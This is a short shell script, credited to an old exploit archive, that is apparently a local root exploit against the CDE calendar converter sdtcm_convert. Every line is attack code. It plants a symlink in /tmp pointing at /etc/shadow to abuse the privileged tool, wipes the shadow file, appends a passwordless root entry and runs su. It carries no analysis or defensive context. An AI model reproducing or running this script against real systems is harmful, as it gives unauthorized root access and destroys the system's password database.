#!/bin/sh

ln -s /etc/shadow /tmp/calorig.$USER
/usr/dt/bin/sdtcm_convert -d /tmp -v 3 $USER
ls -l /etc/shadow
chmod 644 /etc/shadow
cp /dev/null /etc/shadow
ls -l /etc/shadow
echo "root::6445::::::" >> /etc/shadow
su
#                 www.hack.co.za           [2000]#